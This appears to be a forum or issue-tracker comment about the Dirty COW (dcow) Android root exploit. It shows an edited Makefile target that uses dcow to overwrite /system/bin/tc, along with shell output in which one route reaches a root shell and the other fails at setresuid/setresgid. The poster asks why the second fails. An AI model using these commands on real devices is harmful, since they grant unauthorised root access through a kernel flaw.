@kirbyfan64 @droidvoider @toxeus Thanks guys for your suggestions, they were helpful to me.
@Manouchehri @AnwarMohamed @toxeus @0x454447415244 @mikemaksymowych @droidvoider
I got a root shell when I tried with the original Makefile, but when I tried with the edited Makefile, setresuid()/setresgid() failed.
The edit was of only 2 lines, at:
root: push
	adb shell 'chmod 777 /data/local/tmp/dcow'
	adb push libs/$(ARCH)/run-as /data/local/tmp/tc
	adb shell '/data/local/tmp/dcow /data/local/tmp/tc /system/bin/tc'
With this I was trying to do the same as what we do with run-as, but with the tc binary file.
Everything goes well (compiling, pushing, chmod, exploitation, etc.) but when I tried

Trying with the edited Makefile:
shell@android:/ $ id
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)
shell@android:/ $ /system/bin/tc
uid /system/bin/tc 2000
setresgid/setresuid failed_
uid 2000
no selinux?
shell@android:/ $ id
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)

Trying with the original Makefile:
shell@android:/ $ /system/bin/run-as
uid /system/bin/run-as 2000
uid 0
no selinux?
shell@android:/ # id
uid=0(root) gid=0(root) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats
shell@android:/ # exit
shell@android:/ $ exit

So what's happening? Why did the setresuid()/setresgid() system calls fail to set the r e s id when using tc in place of run-as in the edited Makefile?